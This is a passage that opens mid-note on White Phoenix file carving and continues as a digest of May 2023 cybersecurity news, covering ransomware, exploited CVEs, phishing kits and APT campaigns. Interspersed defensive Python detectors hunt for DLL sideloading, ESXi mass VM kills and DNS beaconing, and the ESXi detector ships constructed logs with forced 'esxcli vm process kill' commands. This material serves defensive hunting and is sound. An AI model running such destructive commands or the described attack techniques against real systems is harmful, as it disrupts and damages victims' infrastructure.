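    The carved chunks are only the raw material: for the PDF and Office formats that White Phoenix targets, the recovered ranges still need format-aware reassembly (locating intact text streams, images and so on), which this example does not attempt. The threshold also assumes the file's own content is not already compressed or encrypted, since such data scores as "encrypted" and would be discarded.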

    Microsoft Fixes BlackLotus Vulnerability, Again

    As part of its May Patch Tuesday release, Microsoft issued an optional patch that addresses, for the second time, the Secure Boot zero-day vulnerability exploited by the BlackLotus UEFI bootkit. In all, the Redmond giant pushed out 38 security fixes in its May patch cycle, addressing three zero-day flaws, two of which are under active exploitation (including the UEFI flaw), and six bugs rated critical. Security researchers earlier this year spotted the BlackLotus bootkit for sale on hacker forums for $5,000.

    Experts Detail New Zero-Click Windows Vulnerability for NTLM Credential Theft

    Cybersecurity researchers have shared details about a now-patched security flaw in the Windows MSHTML platform that could be abused to bypass integrity protections on targeted machines. The vulnerability, tracked as CVE-2023-29324 (CVSS score: 6.5), has been described as a security feature bypass. It was addressed by Microsoft as part of its Patch Tuesday updates for May 2023. Akamai security researcher Ben Barnea, who discovered and reported the bug, noted that all Windows versions are affected, but pointed out that Exchange servers with the March update no longer carry the vulnerable feature. "An unauthenticated attacker on the internet could use the vulnerability to coerce an Outlook client to connect to an attacker-controlled server," Barnea said in a report shared with The Hacker News.

    Cybersecurity Firm Dragos Discloses Cybersecurity Incident, Extortion Attempt

    Industrial cybersecurity company Dragos today disclosed what it describes as a "cybersecurity event" after a known cybercrime gang attempted to breach its defenses and infiltrate the internal network to encrypt devices. While Dragos states that the threat actors did not breach its network or cybersecurity platform, they got access to the company's SharePoint cloud service and contract management system (Bleeping Computer, 2023). "On May 8, 2023, a known cybercriminal group attempted and failed at an extortion scheme against Dragos. No Dragos systems were breached, including anything related to the Dragos Platform," the company said.

    New ‘Greatness’ Service Simplifies Microsoft 365 Phishing Attacks

    Greatness, a phishing-as-a-service (PhaaS) platform, has seen a surge in activity as it focuses on organizations that use Microsoft 365 in the United States, Canada, the U.K., Australia, and South Africa. As a widely used cloud-based productivity platform, Microsoft 365 is highly coveted by cybercriminals who seek to steal data or login credentials for use in network intrusions. According to a recent report from Cisco Talos, the Greatness phishing platform was established in mid-2022, with significant upsurges in activity in December 2022 and again in March 2023.

    Critical Ruckus RCE Flaw Exploited By New DDoS Botnet Malware

    A new malware botnet named 'AndoryuBot' is targeting a critical-severity flaw in the Ruckus Wireless Admin panel to infect unpatched Wi-Fi access points for use in DDoS attacks. Tracked as CVE-2023-25717, the flaw impacts all Ruckus Wireless Admin panels version 10.4 and older, allowing remote attackers to perform code execution by sending unauthenticated HTTP GET requests to vulnerable devices. The flaw was discovered and fixed on February 8, 2023. Still, many have not applied the available security updates, while end-of-life models impacted by the security problem will not get a patch.

    Food Distribution Giant Sysco Warns of Data Breach After Cyberattack

    Sysco, a major global food distribution company, has confirmed that its network was breached earlier this year by attackers who stole sensitive information, including business, customer, and employee data. In an internal memo sent to employees on May 3rd and seen by BleepingComputer, the company revealed that customer and supplier data in the U.S. and Canada, as well as personal information belonging to U.S. employees, may have been impacted in the incident.

    Top 5 Password Cracking Techniques Used by Hackers

    Phishing is often cited as the most successful initial access method for both cybercriminals and more sophisticated nation-state actors. Gaining access to valid accounts is one of the easiest and most powerful tools available to a threat actor: why spend resources breaching powerful security tools when you can simply trick an employee into clicking a bad link, or crack their password?

    Multiple Vulnerabilities in Aruba Products Could Allow for Arbitrary Code Execution

    Multiple vulnerabilities have been discovered in Aruba products, the most severe of which could allow for arbitrary code execution. Aruba Mobility Conductor is an advanced WLAN management platform deployed as a virtual machine (VM) or installed on an x86-based hardware appliance. Aruba Mobility Controller is a WLAN hardware controller; in a virtualized environment it manages WLAN Gateways and SD-WAN Gateways, which are in turn managed by Aruba Central.

    BEC Campaign via Israel Spotted Targeting Large Multinational Companies

    Abnormal Security researchers have identified a threat group based in Israel that is responsible for a series of business email compromise (BEC) campaigns. The group's primary targets are large multinational corporations with annual revenue exceeding $10 billion. Since February 2021, the group has launched approximately 350 BEC campaigns, with email attacks directed at employees in 61 countries spanning six continents. The attackers impersonate the targeted employee's CEO and subsequently hand the conversation over to a second external persona, typically a mergers and acquisitions attorney who oversees the payment process. In certain cases, once the attack advances to this second stage, the perpetrators ask to switch from email to a WhatsApp voice call to expedite the attack and minimize the chances of leaving behind any traceable evidence.

    FBI Seizes 13 More Domains Linked to DDoS-For-Hire Services

    The U.S. Justice Department announced today the seizure of 13 more domains linked to DDoS-for-hire platforms, also known as 'booter' or 'stresser' services. This week's seizures are part of a coordinated international law enforcement effort (known as Operation PowerOFF) to disrupt online platforms that let anyone launch massive distributed denial-of-service (DDoS) attacks against any target for a fee.

    Five Takeaways From the Russian Cyber-Attack on Viasat's Satellites

    The cyber-attack on US firm Viasat’s KA-SAT satellites in Ukraine on February 24, 2022, prompted one of the largest formal attributions of a cyber-attack to a nation-state in history. Nearly 20 countries accused Russia of being responsible, including a dozen EU member states and the Five Eyes countries (US, UK, Australia, New Zealand and Canada). This cyber intrusion, which preceded Russia’s invasion of its neighbor by just a few hours, was thoroughly discussed during the third edition of CYSAT, an event dedicated to cybersecurity in the space industry that took place in Paris, France on April 26-27, 2023.

    Western Digital Says Hackers Stole Customer Data in March Cyberattack

    Western Digital Co. has taken its store offline and sent customers data breach notifications after confirming that hackers stole sensitive personal information in a March cyberattack. The company emailed the data breach notifications late Friday afternoon, warning that customers' data was stored in a Western Digital database stolen during the attack.

    Fleckpe Trojan Infects 620K Devices via Google Play

    The Google Play store was found to have hosted Android malware, dubbed Fleckpe, disguised as legitimate applications that had been downloaded over 620,000 times since 2022. The malicious code was hidden in 11 apps posing as photo editors, camera apps and smartphone wallpaper packs before they were taken down. Once installed, the malware runs a payload from the app's assets that sends the infected device's mobile country code and mobile network code to a command-and-control server. The server responds with a paid subscription page, which the Trojan opens in an invisible web view to subscribe the victim without their knowledge.

    Meet Akira — A New Ransomware Operation Targeting the Enterprise

    The Akira ransomware operation is gradually expanding its list of victims by infiltrating corporate networks globally, encrypting files, and demanding ransoms amounting to millions of dollars. The operation began in March 2023 and has already targeted 16 companies in diverse industries such as finance, education, real estate, manufacturing, and consulting. Although there was ransomware named Akira released in 2017, there is no connection between these two operations.

    MSI’s Firmware, Intel Boot Guard Private Keys Leaked

    The cybercriminals who breached Taiwanese multinational MSI last month have apparently leaked the company’s private code signing keys on their dark web site. MSI (Micro-Star International) is a corporation that develops and sells computers (laptops, desktops, all-in-one PCs, servers, etc.) and computer hardware (motherboards, graphics cards, PC peripherals, etc.). The company confirmed in early April that it had been hacked. A ransomware group called Money Message claimed responsibility for the breach, said they grabbed (among other things) some of the company’s source code, and asked for $4 million to return/delete it.

    New Cactus Ransomware Encrypts Itself to Evade Antivirus

    Researchers at corporate investigation firm Kroll have uncovered a new ransomware operation, dubbed Cactus, that exploits known vulnerabilities in Fortinet VPN appliances to gain initial access to the networks of large commercial entities. What sets this group apart is an unusual evasion tactic: the ransomware binary is itself encrypted and needs a key supplied at run time to unpack, which hinders static scanning by antivirus solutions.

    Kimsuky Hackers Use New Recon Tool to Find Security Gaps

    The Kimsuky hacking group, also tracked as Thallium and Velvet Chollima, has been using a new version of its reconnaissance malware, called ReconShark, in a global cyberespionage campaign. According to SentinelLabs, the group has broadened its target range to include government organizations, research centers, universities, and think tanks in the US, Europe, and Asia. South Korean and German authorities warned in March 2023 that Kimsuky had distributed malicious Chrome extensions and Android spyware acting as a remote access trojan to target Gmail accounts. Kaspersky previously reported in August 2022 that the group had targeted politicians, diplomats, university professors, and journalists in South Korea using a multi-stage target validation scheme to ensure that only valid targets were infected.

    Microsoft Patches Serious Azure Cloud Security Flaws

    Microsoft has patched three vulnerabilities in its Azure cloud platform that could have allowed attackers to access sensitive info on a targeted service, deny access to the server, or scan the internal network to mount further attacks, researchers have found. Researchers from the Ermetic Research Team discovered the flaws in the Azure API Management Service, which allows organizations to create, manage, secure, and monitor APIs across all of their environments, they revealed in a blog post published Thursday.

    Russian Hackers Use WinRAR to Wipe Ukraine State Agency’s Data

    The Russian 'Sandworm' hacking group has been linked to an attack on Ukrainian state networks where WinRAR was used to destroy data on government devices. In a new advisory, the Ukrainian Government Computer Emergency Response Team (CERT-UA) says the Russian hackers used compromised VPN accounts that weren't protected with multi-factor authentication to access critical systems in Ukrainian state networks. Once they gained access to the network, they employed scripts that wiped files on Windows and Linux machines using the WinRAR archiving program.

    City of Dallas Hit by Royal Ransomware Attack Impacting IT Services

    The City of Dallas, Texas, has suffered a Royal ransomware attack, causing it to shut down some of its IT systems to prevent the attack's spread. Dallas is the ninth largest city in the United States, with a population of approximately 2.6 million people, according to US census data. Local media reported that the City's police communications and IT systems were shut down Monday morning due to a suspected ransomware attack. This has led to 911 dispatchers having to write down received reports for officers rather than submit them via the computer-assisted dispatch system. The Dallas County Police Department's website was also offline for part of the day due to the security incident but has since been restored.

    Hackers Start Using Double DLL Sideloading to Evade Detection

    A hacking group tracked as Dragon Breath, Golden Eye Dog, or APT-Q-27 is using several sophisticated variations on the classic DLL sideloading technique to avoid detection. The attack chains start with a legitimate application, such as Telegram, sideloading a second-stage payload, which may itself be a legitimate file, and which in turn loads the malicious loader DLL.
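    One way to hunt for the pattern above in endpoint telemetry, as an added Python example that is not Sophos's or the group's code: score Sysmon-style image-load events (Event ID 7 fields Image, ImageLoaded, Signed, Signature) for the two classic sideload signals, a well-known DLL name resolved from the application directory instead of a system directory, and an unsigned DLL loaded from the process's own user-writable directory, then report processes that show the pattern more than once. The events, the list of hijack-prone DLL names, and the directory prefixes are constructed assumptions for the demonstration.

```python
"""Added example: flag DLL sideloading candidates in Sysmon-style image-load
(Event ID 7) records and report processes that show the pattern twice, the
'double' sideload described above. Events are constructed; this is not
Sophos's or the attackers' code, and the DLL name list is an assumption."""
from collections import defaultdict
from dataclasses import dataclass
import ntpath

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\temp\\")
# Assumption: DLL names that Windows programs resolve by name, so a copy
# placed in the application directory wins the search order.
HIJACK_PRONE = {"version.dll", "dbghelp.dll", "cryptsp.dll", "profapi.dll", "wtsapi32.dll"}


@dataclass
class ImageLoad:
    pid: int
    image: str          # the process executable (Sysmon "Image")
    image_loaded: str   # the DLL that was mapped (Sysmon "ImageLoaded")
    signed: bool        # Sysmon "Signed"
    signer: str         # Sysmon "Signature", "" when unsigned


def _under(path: str, prefixes) -> bool:
    return path.lower().startswith(prefixes)


def sideload_reasons(ev: ImageLoad) -> list[str]:
    """Why this load looks like a sideload; an empty list means clean."""
    name = ntpath.basename(ev.image_loaded).lower()
    dll_dir = ntpath.dirname(ev.image_loaded).lower()
    exe_dir = ntpath.dirname(ev.image).lower()
    reasons = []
    if name in HIJACK_PRONE and not _under(ev.image_loaded, SYSTEM_DIRS):
        reasons.append(f"{name} resolved from {dll_dir} instead of a system directory")
    if not ev.signed and dll_dir == exe_dir and _under(ev.image, USER_WRITABLE):
        reasons.append("unsigned DLL loaded from the process's own user-writable directory")
    return reasons


def find_double_sideloads(events: list[ImageLoad]) -> dict[int, list[tuple[str, list[str]]]]:
    """Group flagged loads by PID and keep processes with two or more of them:
    a legitimate host that sideloads a DLL which in turn pulls in another."""
    per_pid = defaultdict(list)
    for ev in events:
        reasons = sideload_reasons(ev)
        if reasons:
            per_pid[ev.pid].append((ntpath.basename(ev.image_loaded).lower(), reasons))
    return {pid: loads for pid, loads in per_pid.items() if len(loads) >= 2}


# Constructed events: a benign process, a process that sideloads once, and a
# process that shows the double pattern.
EVENTS = [
    ImageLoad(1000, r"C:\Program Files\Vendor\app.exe",
              r"C:\Windows\System32\version.dll", True, "Microsoft Windows"),
    ImageLoad(2000, r"C:\Users\bob\Downloads\tool.exe",
              r"C:\Users\bob\Downloads\helper.dll", False, ""),
    ImageLoad(4242, r"C:\Users\bob\AppData\Local\Messenger\messenger.exe",
              r"C:\Users\bob\AppData\Local\Messenger\version.dll", False, ""),
    ImageLoad(4242, r"C:\Users\bob\AppData\Local\Messenger\messenger.exe",
              r"C:\Users\bob\AppData\Local\Messenger\dbghelp.dll", False, ""),
    ImageLoad(4242, r"C:\Users\bob\AppData\Local\Messenger\messenger.exe",
              r"C:\Windows\System32\kernel32.dll", True, "Microsoft Windows"),
]

if __name__ == "__main__":
    for pid, loads in find_double_sideloads(EVENTS).items():
        print(f"pid {pid}: double sideload candidate")
        for dll, reasons in loads:
            print(f"  {dll}: " + "; ".join(reasons))
```

    Sysmon does not record which module requested a given load, so the chain is reconstructed only as "same process, several hijack-shaped loads"; correlating with the process-creation event (Event ID 1) and the flagged DLL's import table would tighten it, and the hijack-prone name list should be tuned to what your own fleet actually loads.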

    Google Chrome Will Lose the “Lock” Icon for HTTPS-Secured Sites

    In September 2023, Google Chrome will stop showing the lock icon when a site loads over HTTPS, partly due to the now ubiquitous use of the protocol. It took many years, but the unceasing push by Google, other browser makers and Let's Encrypt to make HTTPS the norm for accessing resources on the Web has been an unmitigated success; according to Google, over 95% of page loads in Chrome on Windows now travel over an encrypted, authenticated HTTPS channel.

    FBI Seizes 9 Crypto Exchanges Used to Launder Ransomware Payments

    In a recent announcement, the FBI stated that, alongside the Virtual Currency Response Team, the National Police of Ukraine, and prosecutors in that country, it seized several cryptocurrency exchange sites that were used by scammers and cybercriminals, including ransomware actors, to launder money taken from victims.

    Researchers Uncover New BGP Flaws in Popular Internet Routing Protocol Software

    Cybersecurity researchers have uncovered weaknesses in a software implementation of the Border Gateway Protocol (BGP) that could be weaponized to achieve a denial-of-service (DoS) condition on vulnerable BGP peers. BGP is a gateway protocol that's designed to exchange routing and reachability information between autonomous systems. It's used to find the most efficient routes for delivering internet traffic. The three vulnerabilities reside in version 8.4 of FRRouting, a popular open source internet routing protocol suite for Linux and Unix platforms.

    APT41 Subgroup Plows Through Asia-Pacific, Utilizing Layered Stealth Tactics

    APT41 is a well-known Chinese cyber threat that is made up of various subgroups. The group has previously used a variety of tactics over the years to carry out espionage attacks against government agencies, businesses, and individuals. The group's attacks against the US government have led to indictments of its members by US law enforcement. On May 2, Trend Micro researchers reported that Earth Longzhi, a suspected subgroup of APT41, has launched a new campaign after almost a year of inactivity with more advanced stealth tactics to carry out espionage campaigns against the same types of targets.

    T-Mobile Discloses Second Data Breach Since the Start of 2023

    T-Mobile disclosed the second data breach of 2023 after discovering that attackers had access to the personal information of hundreds of customers for more than a month, starting late February 2023. Compared to previous data breaches reported by T-Mobile, the latest of which impacted 37 million people, this incident affected only 836 customers.

    Apple’s First Rapid Security Response Patch Fails to Install on iPhones

    Apple has launched the first Rapid Security Response (RSR) patches for iOS 16.4.1 and macOS 13.3.1 devices. As the company describes in a recently published support document, RSR patches are small-sized updates that target the iPhone, iPad, and Mac platforms and patch security issues between major software updates. Some of these out-of-band security updates may also be used to address vulnerabilities actively exploited in attacks.

    New LOBSHOT Malware Gives Hackers Hidden VNC Access to Windows Devices

    A newly discovered malware named 'LOBSHOT' can discreetly take control of Windows devices using hVNC (hidden VNC) and is being distributed through Google Ads. Cybersecurity researchers had earlier reported an increase in threat actors using Google ads to distribute malware through fake websites for popular applications such as 7-Zip, VLC, OBS, Notepad++, CCleaner, TradingView, Rufus, and others. These malicious sites pushed malware, including Gozi, RedLine, Vidar, Cobalt Strike, SectopRAT, and the Royal ransomware, instead of the intended applications.

    Killer Use Cases for AI Dominate RSA Conference Discussions

    Pre-RSA social media gaming predicted it. Many predicted they would loathe it. And it happened: discussions at this year's RSA conference again and again came back to generative artificial intelligence, but with a twist. Even some of the skeptics professed their conversion to the temple of AI, whose overlord, for better or worse, is poised to preside over human activity with indifference about good or evil intent. Count Israeli cryptographer Adi Shamir, the S in the RSA cryptosystem, as a convert. One year ago, speaking at RSA, he thought AI might have some defensive use cases but didn't see it being an offensive threat.

    APT28 Targets Ukrainian Government Entities with Fake "Windows Update" Emails

    The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks perpetrated by Russian nation-state hackers targeting various government bodies in the country. The agency attributed the phishing campaign to APT28, which is also known by the names Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit, and Sofacy. The email messages come with the subject line "Windows Update" and purportedly contain instructions in the Ukrainian language to run a PowerShell command under the pretext of security updates.

    Hackers Target Vulnerable Veeam Backup Servers Exposed Online

    According to researchers at WithSecure, a Finnish cybersecurity and privacy company, threat actors have been leveraging a recently fixed vulnerability in Veeam Backup and Replication software to target unpatched Veeam backup servers. The vulnerability in question is being tracked as CVE-2023-27532 and allows unauthenticated users in the backup infrastructure to obtain encrypted credentials stored in the VeeamVBR configuration database.

    One Brooklyn Reports Breach, Faces Lawsuit Post-Cyberattack

    A safety net hospital system in New York City faces a proposed class action lawsuit tied to a late 2022 cybersecurity incident that breached the personal information of more than 235,000 patients. The incident affected three One Brooklyn Health System hospitals and several other facilities. First discovered on Nov 19, 2022, the incident caused patient rerouting and disrupted access to electronic health records and patient portals for more than a month.

    Hackers Leak Images to Taunt Western Digital’s Cyberattack Response

    The ransomware group known as ALPHV or BlackCat has shared screenshots of internal emails and video conferences taken from Western Digital's systems. This suggests that the hackers maintained access to the company's networks even as Western Digital worked to address the cyber attack. The leak occurred after the group had issued a warning to Western Digital on April 17, stating they would escalate their actions until the company paid a ransom or could no longer withstand the consequences.

    Cold Storage Giant Americold Outage Caused by Network Breach

    Americold, a leading cold storage and logistics company, has been facing IT issues since its network was breached on Tuesday night. The company said it contained the attack and is now investigating the incident, which, according to customer and employee reports, also disrupted operations. It estimated that its systems will be down until at least next week.

    Vietnamese Hackers Linked to 'Malverposting' Campaign

    According to a recent blog post by Guardio Labs, a Vietnamese threat actor is conducting a malverposting campaign, which has been ongoing for several months. It's estimated that this campaign has infected more than 500,000 devices worldwide within the last three months alone. Malverposting is the act of using social media posts and tweets to spread malicious software and other security threats. In this instance, the attacker abused Facebook's Ad service to distribute malware. Guardio Labs' head of cyber security, Nati Tal, stated that the high number of infections was made possible by using Facebook's Ad service as the initial delivery mechanism.

    Hackers Exploit TP-Link N-Day Flaw to Build Mirai Botnet

    Researchers from Trend Micro's Zero Day Initiative said telemetry from Eastern Europe indicates that Mirai operators are exploiting a flaw in the TP-Link Archer AX21 firmware. The bug, CVE-2023-1389, allows attackers to inject a command through the router's web management interface. A handful of teams competing in the December 2022 Pwn2Own competition in Toronto identified the flaw.

    New Atomic macOS Malware Steals Keychain Passwords and Crypto Wallets

    Threat actors are advertising a new information stealer for the Apple macOS operating system called Atomic macOS Stealer (or AMOS) on Telegram for $1,000 per month, joining the likes of MacStealer. "The Atomic macOS Stealer can steal various types of information from the victim's machine, including Keychain passwords, complete system information, files from the desktop and documents folder, and even the macOS password," Cyble researchers said in a technical report.

    Linux Version of RTM Locker Ransomware Targets VMware ESXi Servers

    In a new report by Uptycs, researchers analyzed a Linux variant of RTM Locker that is based on the leaked source code of the now-defunct Babuk ransomware. The RTM Locker Linux encryptor appears to be created explicitly for attacking VMware ESXi systems, as it contains numerous references to commands used to manage virtual machines. When launched, the encryptor first gathers a list of running VMs, terminates all of them, and then encrypts files with the following extensions: .log (log files), .vmdk (virtual disks), .vmem (virtual machine memory), .vswp (swap files), and .vmsn (VM snapshots). All of these files are associated with virtual machines running on VMware ESXi. Like Babuk, RTM uses random number generation and ECDH on Curve25519 for asymmetric encryption, but instead of Sosemanuk it relies on ChaCha20 for symmetric encryption.
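    As an added hunting example (not code from the page or from Uptycs), the following Python scans ESXi shell-history style log lines for the sequence described above: an enumeration of running VMs followed by a burst of forced VM kills. The log lines are constructed to resemble ESXi's /var/log/shell.log and are not real telemetry, and the esxcli command forms are an assumption, since the report only says the encryptor references VM-management commands.

```python
"""Hunt ESXi shell history for 'enumerate VMs, then kill them all' bursts.

Added example; not code from the page or from Uptycs. The log lines below are
constructed in the style of ESXi's /var/log/shell.log and are not real data.
"""
import re
from datetime import datetime, timedelta

# Constructed sample: one burst of forced kills at 02:11 after an enumeration,
# then a single, benign-looking soft kill hours later.
SAMPLE_SHELL_LOG = """\
2023-04-20T02:11:03Z shell[20041]: [root]: esxcli vm process list
2023-04-20T02:11:09Z shell[20041]: [root]: esxcli vm process kill --type=force --world-id=2100311
2023-04-20T02:11:10Z shell[20041]: [root]: esxcli vm process kill --type=force --world-id=2100345
2023-04-20T02:11:10Z shell[20041]: [root]: esxcli vm process kill --type=force --world-id=2100377
2023-04-20T02:11:11Z shell[20041]: [root]: esxcli vm process kill --type=force --world-id=2100402
2023-04-20T02:11:14Z shell[20041]: [root]: ls /vmfs/volumes/datastore1/
2023-04-20T09:30:44Z shell[20188]: [root]: esxcli vm process list
2023-04-20T09:32:01Z shell[20188]: [root]: esxcli vm process kill --type=soft --world-id=2100402
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})Z shell\[\d+\]: "
    r"\[(?P<user>[^\]]+)\]: (?P<cmd>.*)$"
)
# Assumed command forms; the report only says the encryptor references
# VM-management commands.
KILL_RE = re.compile(r"\besxcli\s+vm\s+process\s+kill\b")
LIST_RE = re.compile(r"\besxcli\s+vm\s+process\s+list\b")


def parse_shell_log(text):
    """Return (timestamp, user, command) tuples in file order."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
            events.append((ts, m["user"], m["cmd"]))
    return events


def find_mass_kills(text, min_kills=3, window_s=60):
    """Flag >= min_kills VM kills inside window_s seconds.

    Each alert records whether a 'process list' ran in the window before the
    burst, since the encryptor enumerates VMs before terminating them.
    """
    events = parse_shell_log(text)
    kills = [(ts, user) for ts, user, cmd in events if KILL_RE.search(cmd)]
    lists = [ts for ts, _, cmd in events if LIST_RE.search(cmd)]
    window = timedelta(seconds=window_s)
    alerts = []
    i = 0
    while i < len(kills):
        j = i
        while j + 1 < len(kills) and kills[j + 1][0] - kills[i][0] <= window:
            j += 1
        count = j - i + 1
        if count >= min_kills:
            start = kills[i][0]
            enumerated = any(start - window <= t <= start for t in lists)
            alerts.append({
                "start": start.isoformat(),
                "user": kills[i][1],
                "kills": count,
                "preceded_by_list": enumerated,
            })
            i = j + 1
        else:
            i += 1
    return alerts


if __name__ == "__main__":
    for alert in find_mass_kills(SAMPLE_SHELL_LOG):
        print(alert)
```

    The single soft kill at 09:32 is not reported because it never reaches the burst threshold; tune min_kills and window_s to the host's normal maintenance pattern, and pair the alert with datastore write activity on the extensions listed above.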

    Zyxel Fixed a Critical RCE Flaw in its Firewall Devices and Urges Customers to Install the Patches

    Researchers from TRAPA Security have discovered a critical remote code execution vulnerability, tracked as CVE-2023-28771 (CVSS score 9.8), impacting Zyxel firewalls. The vulnerability stems from improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73, VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35, and ATP series firmware versions 4.60 through 5.35. A remote, unauthenticated attacker can trigger the flaw by sending specially crafted packets to a vulnerable device and execute OS commands remotely.

    Tencent QQ Users Hacked in Mysterious Malware Attack, Says ESET

    Security researchers from ESET have linked a Chinese APT hacking group, Evasive Panda, to an attack that distributed the MsgBot malware via an automatic update for the Tencent QQ messaging app. Evasive Panda has been active since at least 2012, targeting organizations and individuals in mainland China, Hong Kong, Macao, Nigeria, and several countries in Southeast and East Asia. ESET discovered the latest campaign in January 2022, but evidence suggests it began in 2020. The victims, primarily members of an international NGO, are concentrated in the provinces of Gansu, Guangdong, and Jiangsu, indicating a specific and targeted approach.

    Obscure Network Protocol Has Flaw That Could Unleash DDoS

    An obscure routing protocol codified during the 1990s has come roaring back to attention after researchers found a flaw that would allow attackers to initiate massive distributed denial-of-service attacks. Researchers from Bitsight and Curesec say they found a bug in Service Location Protocol. Service Location Protocol, the brainchild of executives from Sun Microsystems and a now-defunct internet service provider, was envisioned as a dynamic method of discovering resources such as printers on a closed enterprise network.

    Clop, LockBit Ransomware Gangs Behind PaperCut Server Attacks

    On April 19th, PaperCut, a printing management software company, disclosed that threat actors were actively exploiting two flaws in PaperCut MF or NG, urging admins to upgrade their servers to the latest version as soon as possible. The flaws, tracked as CVE-2023-27350 and CVE-2023-27351, were fixed last month in the PaperCut Application Server and allow remote attackers to perform unauthenticated remote code execution and information disclosure.

    Chinese Hackers Use New Linux Malware Variants for Espionage

    Fresh Linux malware variants are being used by hackers in cyber espionage attacks, including a novel PingPull version and a previously undocumented backdoor known as Sword2033. PingPull was first observed last year as a remote access trojan (RAT) in espionage operations by the Chinese state-sponsored group Gallium (also tracked as Alloy Taurus), targeting government and financial institutions in Australia, Russia, Belgium, Malaysia, Vietnam and the Philippines.

    VMware Fixes Critical Zero-Day Exploit Chain Used at Pwn2own

    VMware has released security updates to address zero-day vulnerabilities that could be chained to gain code execution on systems running unpatched versions of the company's Workstation and Fusion software hypervisors. The two flaws were part of an exploit chain demoed by the STAR Labs team's security researchers one month ago, during the second day of the Pwn2Own Vancouver 2023 hacking contest.

    New SLP Vulnerability Could Let Attackers Launch 2200x Powerful DDoS Attacks

    Bitsight and Curesec researchers Pedro Umbelino and Marco Lux recently uncovered a high-severity vulnerability impacting Service Location Protocol (SLP), a service discovery protocol that allows devices to find services in a local area network such as printers, file servers, and other network resources. The vulnerability in question is being tracked as CVE-2023-29552 (CVSS score: 8.6) and could be exploited to launch large-scale reflective denial-of-service (DoS) amplification attacks with an amplification factor of up to 2,200, making it one of the largest amplification vectors seen to date.

    Exploit Released for PaperCut Flaw Abused to Hijack Servers, Patch Now

    Threat actors are exploiting several vulnerabilities in the print management software, PaperCut MF/NG, to install Atera remote management software and take over servers. The vulnerabilities in question are being tracked as CVE-2023-27350 and CVE-2023-27351 and allow remote attackers to bypass authentication and execute arbitrary code on compromised PaperCut servers with SYSTEM privileges in low-complexity attacks that don't require user interaction.

    Google Ads Push BumbleBee Malware Used by Ransomware Gangs

    Researchers at Secureworks recently discovered a new campaign using Google advertisements that promote trojanized versions of popular apps to deliver BumbleBee malware to unsuspecting victims. Bumblebee is a malware loader discovered in April 2022, thought to have been developed by the Conti team as a replacement for the BazarLoader backdoor, used for gaining initial access to networks and conducting ransomware attacks.

    Intel CPUs Vulnerable to New Transient Execution Side-Channel Attack

    The attack works as a side channel to Meltdown, a critical security flaw discovered in 2018, impacting many x86-based microprocessors. Meltdown exploits a performance optimization feature called “speculative execution” to enable attackers to bypass memory isolation mechanisms to access secrets stored in kernel memory like passwords, encryption keys, and other private data.

    TP-Link Archer WiFi Router Flaw Exploited by Mirai Malware

    The TP-Link Archer AX21 (AX1800) WiFi router vulnerability, tracked as CVE-2023-1389, is being exploited by the Mirai malware botnet to add devices to its DDoS attacks. The vulnerability was first exploited by two hacking teams during the Pwn2Own Toronto event in December 2022, using different access paths through the router's LAN and WAN interfaces. TP-Link was made aware of the flaw in January 2023 and released a patch last month via a firmware update. Last week, the Zero Day Initiative detected exploitation attempts in the wild, first targeting Eastern Europe and then spreading globally.

    Decoy Dog Malware Toolkit Found After Analyzing 70 Billion DNS Queries

    Researchers have uncovered a novel malware toolkit called Decoy Dog, which specifically targets enterprises. The toolkit is designed to bypass standard detection mechanisms by generating anomalous DNS traffic that differs from regular internet activity. Decoy Dog utilizes techniques like strategic domain aging and DNS query dribbling to establish a good reputation with security vendors before pivoting to conducting cybercrime operations.
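    An added example, not part of the page or of the Decoy Dog research, showing how a defender might hunt for the "DNS query dribbling" behaviour described above: a small number of queries to one registered domain that recur at suspiciously regular intervals over a long period. The DNS records are constructed, the thresholds are assumptions to be tuned per environment, and the domain-aging check (which needs registration or passive-DNS first-seen data) is not modelled.

```python
"""Flag low-and-slow DNS beaconing ("query dribbling") in a DNS query log.

Added example; not from the page or the Decoy Dog researchers. Records and
thresholds are constructed/assumed; the domain-aging check is not modelled.
"""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

BASE = datetime(2023, 4, 24, 0, 0, 0)


def constructed_log():
    """Constructed (timestamp, client, qname) records; not real telemetry."""
    rows = []
    # Beacon: one query roughly every 15 minutes, small jitter, for ~6 hours.
    jitter = [0, 3, -2, 5, -4, 1, 2, -3, 4, -1, 0, 3,
              -2, 5, -4, 1, 2, -3, 4, -1, 0, 3, -2, 5]
    for i, j in enumerate(jitter):
        rows.append((BASE + timedelta(seconds=900 * i + j),
                     "10.0.0.8", f"c{i:02d}.upd-cache.example"))
    # Ordinary browsing: bursty, irregular lookups of one site.
    for s in (5, 6, 6, 7, 400, 401, 2000, 2001, 2002,
              9000, 9001, 15000, 15001, 15002):
        rows.append((BASE + timedelta(seconds=s), "10.0.0.8", "www.news.example"))
    return sorted(rows)


def registered_domain(qname):
    """Simplified: last two labels (no Public Suffix List handling)."""
    parts = qname.rstrip(".").split(".")
    return ".".join(parts[-2:])


def find_dribbling(rows, min_queries=12, min_span_s=4 * 3600,
                   max_rate_per_hour=12, max_cv=0.1):
    """Return (client, domain) pairs whose queries are few, slow and regular:
    enough queries over a long span, at a low hourly rate, with a low
    coefficient of variation (stdev / mean) of the gaps between them."""
    groups = defaultdict(list)
    for ts, client, qname in rows:
        groups[(client, registered_domain(qname))].append(ts)
    findings = []
    for (client, domain), times in groups.items():
        times.sort()
        if len(times) < min_queries:
            continue
        span = (times[-1] - times[0]).total_seconds()
        if span < min_span_s:
            continue
        rate = len(times) / (span / 3600)
        if rate > max_rate_per_hour:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0
        if cv <= max_cv:
            findings.append({"client": client, "domain": domain,
                             "queries": len(times),
                             "mean_gap_s": round(mean), "cv": round(cv, 3)})
    return findings


if __name__ == "__main__":
    for finding in find_dribbling(constructed_log()):
        print(finding)
```
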